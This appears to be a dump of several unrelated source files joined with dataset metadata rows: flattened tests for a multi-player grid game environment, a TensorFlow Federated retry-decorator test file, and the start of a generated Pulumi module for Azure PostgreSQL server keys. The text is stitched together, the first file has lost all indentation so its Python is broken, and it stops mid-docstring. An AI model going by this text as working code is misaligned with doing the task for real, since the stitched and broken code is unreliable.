def test_step_MultiplePlayer_SelectSource_SingleActionType(test_name):
"""
There no avatar, multiple players, single action type
env.step([
[x1, y1, actionId1],
[x2, y2, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[1, 3, 1],
[3, 3, 3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (3,)
assert sample[1].shape == (3,)
def test_step_MultiplePlayer_SelectSource_MultipleActionType(test_name):
"""
There no avatar, multiple players
env.step([
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[1, 3, 0, 1],
[3, 3, 1, 3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 1
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
def test_step_MultiplePlayer_SelectSource_SingleActionType_MultipleAction(test_name):
"""
There no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, actionId1],
[x2, y2, actionId2]
],
[ # player 2 multiple actions
[x1, y1, actionId1],
],
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[
[1, 3, 1],
[3, 4, 3],
],
[
[3, 3, 1],
]
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[0][avartar1_id, 0, 3] == 1
assert obs[0][avartar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [2, 3]
assert player2_avatar2_state['Location'] == [1, 4]
assert obs[0][avartar1_id, 2, 3] == 1
assert obs[0][avartar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (3,)
assert sample[1].shape == (3,)
def test_step_MultiplePlayer_SelectSource_MultipleActionType_MultipleAction(test_name):
"""
There no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
],
[ # player 2 multiple actions
[x1, y1, action_type, actionId1],
],
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[
[1, 3, 0, 1],
[3, 4, 1, 3],
],
[
[3, 3, 0, 1],
]
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 1
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[0][avartar1_id, 0, 3] == 1
assert obs[0][avartar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [2, 3]
assert player2_avatar2_state['Location'] == [1, 4]
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[1][avartar1_id, 2, 3] == 1
assert obs[1][avartar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
def test_step_MultiplePlayer_SingleActionType_SingleValue_Agent_DONE(test_name):
"""
There is an avatar
Multiple players
env.step([
actionId_player1,
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
1,
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
sample = env.action_space.sample()
assert len(sample) == 2
def test_step_MultiplePlayer_SingleActionType_ArrayValue_Agent_DONE(test_name):
"""
There no avatar, multiple players
env.step([
[actionId1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
[1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
def test_step_MultiplePlayer_MultipleActionType_Agent_DONE(test_name):
"""
There is an avatar
Multiple players
env.step([
[action_type, actionId_player1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (2,)
assert np.all(env.action_space[p].nvec == [2, 5])
obs, reward, done, info = env.step([
[0, 1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
def test_step_MultiplePlayer_SelectSource_SingleActionType_Agent_DONE(test_name):
"""
There no avatar, multiple players, single action type
env.step([
[x1, y1, actionId1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[1, 3, 1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
def test_step_MultiplePlayer_SelectSource_MultipleActionType_Agent_DONE(test_name):
"""
There no avatar, multiple players
env.step([
[x1, y1, action_type, actionId1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[1, 3, 0, 1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
def test_step_MultiplePlayer_SelectSource_SingleActionType_MultipleAction_Agent_DONE(test_name):
"""
There no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, actionId1],
[x2, y2, actionId2]
],
[ # player 2 is dead
None,
],
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[
[1, 3, 1],
[3, 4, 3],
],
None,
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[0][avartar1_id, 0, 3] == 1
assert obs[0][avartar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [3, 3]
assert player2_avatar2_state['Location'] == [1, 4]
assert obs[0][avartar1_id, 3, 3] == 1
assert obs[0][avartar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (3,)
assert sample[1].shape == (3,)
def test_step_MultiplePlayer_SelectSource_MultipleActionType_MultipleAction_Agent_DONE(test_name):
"""
There no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
],
# player 2 is dead
None,
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[
[1, 3, 0, 1],
[3, 4, 1, 3],
],
None,
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 1
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[0][avartar1_id, 0, 3] == 1
assert obs[0][avartar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [3, 3]
assert player2_avatar2_state['Location'] == [1, 4]
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[1][avartar1_id, 3, 3] == 1
assert obs[1][avartar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
| 27.770718 | 98 | 0.621672 | 4,054 | 30,159 | 4.417119 | 0.02886 | 0.010164 | 0.033506 | 0.025018 | 0.973307 | 0.963031 | 0.949182 | 0.943039 | 0.937678 | 0.935277 | 0 | 0.046387 | 0.241586 | 30,159 | 1,085 | 99 | 27.796313 | 0.736502 | 0.082363 | 0 | 0.830838 | 0 | 0 | 0.086542 | 0.051383 | 0 | 0 | 0 | 0 | 0.517964 | 1 | 0.035928 | false | 0 | 0.005988 | 0.001497 | 0.046407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6fc2f8619f5a8d6afe2402115f76e3af09436fb2 | 9,463 | py | Python | tensorflow_federated/python/common_libs/retrying_test.py | teo-milea/federated | ce0707a954a531860eb38864b44d7b748fd62aa7 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/common_libs/retrying_test.py | teo-milea/federated | ce0707a954a531860eb38864b44d7b748fd62aa7 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/common_libs/retrying_test.py | teo-milea/federated | ce0707a954a531860eb38864b44d7b748fd62aa7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
from typing import Any
from unittest import mock
from absl.testing import absltest
from tensorflow_federated.python.common_libs import retrying
class RetryingArgValidationtest(absltest.TestCase):
def test_raises_non_function(self):
with self.assertRaises(TypeError):
retrying.retry(fn=0)
def test_raises_non_function_exception_filter(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, retry_on_exception_filter=0)
def test_raises_non_function_result_filter(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, retry_on_result_filter=0)
def test_raises_complex_wait_multiplier(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, wait_multiplier=1j)
def test_raises_complex_max_wait_ms(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, wait_max_ms=1j)
def test_raises_zero_wait_multiplier(self):
with self.assertRaises(ValueError):
retrying.retry(fn=lambda x: x, wait_multiplier=0)
def test_raises_zero_max_wait_ms(self):
with self.assertRaises(ValueError):
retrying.retry(fn=lambda x: x, wait_max_ms=0)
class CountInvocations():
def __init__(self, n_invocations_to_raise: int, error_to_raise: Exception,
return_value: Any):
self._n_invocations_to_raise = n_invocations_to_raise
self._error_to_raise = error_to_raise
self._return_value = return_value
self._n_invocations = 0
@property
def n_invocations(self):
return self._n_invocations
def __call__(self, *args, **kwargs):
del args, kwargs # Unused
self._n_invocations += 1
if self._n_invocations <= self._n_invocations_to_raise:
raise self._error_to_raise
return self._return_value
class RetryingFunctionTest(absltest.TestCase):
def test_standalone_decorator_always_retries(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
@retrying.retry
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = invoke_callable()
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_error_filter_raises_wrong_error_type(self):
count_invocations_callable = CountInvocations(1, TypeError('Error'), 0)
@retrying.retry(
retry_on_exception_filter=lambda e: isinstance(e, ValueError))
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
with self.assertRaises(TypeError):
invoke_callable()
def test_error_filter_called_with_raised_err(self):
error = TypeError('error')
expected_result = 1
count_invocations_callable = CountInvocations(1, error, 1)
mock_callable = mock.MagicMock(return_value=True)
def err_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_exception_filter=err_filter)
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = invoke_callable()
self.assertEqual(result, expected_result)
mock_callable.assert_called_once_with(error)
def test_result_filter_not_incur_retry(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
mock_callable = mock.MagicMock(return_value=False)
def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = invoke_callable()
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_result_filter_incur_retry(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
mock_callable = mock.Mock()
mock_callable.side_effect = [True, False]
def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = invoke_callable()
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 2)
class RetryingCoroFunctionTest(absltest.TestCase):
def setUp(self):
self._loop = asyncio.new_event_loop()
super().setUp()
def _run_sync(self, fn, args=None):
return self._loop.run_until_complete(fn(args))
def test_standalone_decorator_always_retries(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
@retrying.retry
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = self._run_sync(invoke_callable)
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_error_filter_raises_wrong_error_type(self):
count_invocations_callable = CountInvocations(1, TypeError('Error'), 0)
@retrying.retry(
retry_on_exception_filter=lambda e: isinstance(e, ValueError))
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
with self.assertRaises(TypeError):
self._run_sync(invoke_callable)
def test_error_filter_called_with_raised_err(self):
error = TypeError('error')
expected_result = 1
count_invocations_callable = CountInvocations(1, error, 1)
mock_callable = mock.MagicMock(return_value=True)
def err_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_exception_filter=err_filter)
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = self._run_sync(invoke_callable)
self.assertEqual(result, expected_result)
mock_callable.assert_called_once_with(error)
def test_result_filter_not_incur_retry(self):
expected_result = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_result)
mock_callable = mock.MagicMock(return_value=False)
def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = self._run_sync(invoke_callable)
self.assertEqual(result, expected_result)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_result_filter_incur_retry(self):
expected_result = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_result)
mock_callable = mock.Mock()
mock_callable.side_effect = [True, False]
def result_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_result_filter=result_filter)
async def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = self._run_sync(invoke_callable)
self.assertEqual(result, expected_result)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 2)
if __name__ == '__main__':
absltest.main()
| 33.556738 | 76 | 0.702209 | 1,108 | 9,463 | 5.647112 | 0.148014 | 0.066486 | 0.099728 | 0.0537 | 0.802781 | 0.775292 | 0.762826 | 0.758191 | 0.747323 | 0.745725 | 0 | 0.006088 | 0.218958 | 9,463 | 281 | 77 | 33.676157 | 0.840482 | 0.073867 | 0 | 0.736559 | 0 | 0 | 0.006634 | 0 | 0 | 0 | 0 | 0 | 0.134409 | 1 | 0.177419 | false | 0 | 0.026882 | 0.069892 | 0.327957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6fd6e99e23904f16be4009b0996a92e4afa2c22f | 14,282 | py | Python | sdk/python/pulumi_azure/postgresql/server_key.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/postgresql/server_key.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/postgresql/server_key.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ServerKeyArgs', 'ServerKey']
@pulumi.input_type
class ServerKeyArgs:
def __init__(__self__, *,
key_vault_key_id: pulumi.Input[str],
server_id: pulumi.Input[str]):
"""
The set of arguments for constructing a ServerKey resource.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "key_vault_key_id", key_vault_key_id)
pulumi.set(__self__, "server_id", server_id)
@property
@pulumi.getter(name="keyVaultKeyId")
def key_vault_key_id(self) -> pulumi.Input[str]:
"""
The URL to a Key Vault Key.
"""
return pulumi.get(self, "key_vault_key_id")
@key_vault_key_id.setter
def key_vault_key_id(self, value: pulumi.Input[str]):
pulumi.set(self, "key_vault_key_id", value)
@property
@pulumi.getter(name="serverId")
def server_id(self) -> pulumi.Input[str]:
"""
The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_id")
@server_id.setter
def server_id(self, value: pulumi.Input[str]):
pulumi.set(self, "server_id", value)
@pulumi.input_type
class _ServerKeyState:
def __init__(__self__, *,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ServerKey resources.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
if key_vault_key_id is not None:
pulumi.set(__self__, "key_vault_key_id", key_vault_key_id)
if server_id is not None:
pulumi.set(__self__, "server_id", server_id)
@property
@pulumi.getter(name="keyVaultKeyId")
def key_vault_key_id(self) -> Optional[pulumi.Input[str]]:
"""
The URL to a Key Vault Key.
"""
return pulumi.get(self, "key_vault_key_id")
@key_vault_key_id.setter
def key_vault_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_vault_key_id", value)
@property
@pulumi.getter(name="serverId")
def server_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_id")
@server_id.setter
def server_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_id", value)
class ServerKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Customer Managed Key for a PostgreSQL Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
current = azure.core.get_client_config()
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tenant_id=current.tenant_id,
sku_name="premium",
purge_protection_enabled=True)
example_server = azure.postgresql.Server("exampleServer",
location=azurerm_resource_group["test"]["location"],
resource_group_name=azurerm_resource_group["test"]["name"],
administrator_login="psqladmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="GP_Gen5_2",
version="11",
storage_mb=51200,
ssl_enforcement_enabled=True,
identity=azure.postgresql.ServerIdentityArgs(
type="SystemAssigned",
))
server = azure.keyvault.AccessPolicy("server",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=example_server.identity.principal_id,
key_permissions=[
"get",
"unwrapkey",
"wrapkey",
],
secret_permissions=["get"])
client = azure.keyvault.AccessPolicy("client",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=current.object_id,
key_permissions=[
"get",
"create",
"delete",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
example_key = azure.keyvault.Key("exampleKey",
key_vault_id=example_key_vault.id,
key_type="RSA",
key_size=2048,
key_opts=[
"decrypt",
"encrypt",
"sign",
"unwrapKey",
"verify",
"wrapKey",
],
opts=pulumi.ResourceOptions(depends_on=[
client,
server,
]))
example_server_key = azure.postgresql.ServerKey("exampleServerKey",
server_id=example_server.id,
key_vault_key_id=example_key.id)
```
## Import
A PostgreSQL Server Key can be imported using the `resource id` of the PostgreSQL Server Key, e.g.
```sh
$ pulumi import azure:postgresql/serverKey:ServerKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforPostgreSQL/servers/server1/keys/keyvaultname_key-name_keyversion
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServerKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Customer Managed Key for a PostgreSQL Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
current = azure.core.get_client_config()
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_key_vault = azure.keyvault.KeyVault("exampleKeyVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tenant_id=current.tenant_id,
sku_name="premium",
purge_protection_enabled=True)
example_server = azure.postgresql.Server("exampleServer",
location=azurerm_resource_group["test"]["location"],
resource_group_name=azurerm_resource_group["test"]["name"],
administrator_login="psqladmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="GP_Gen5_2",
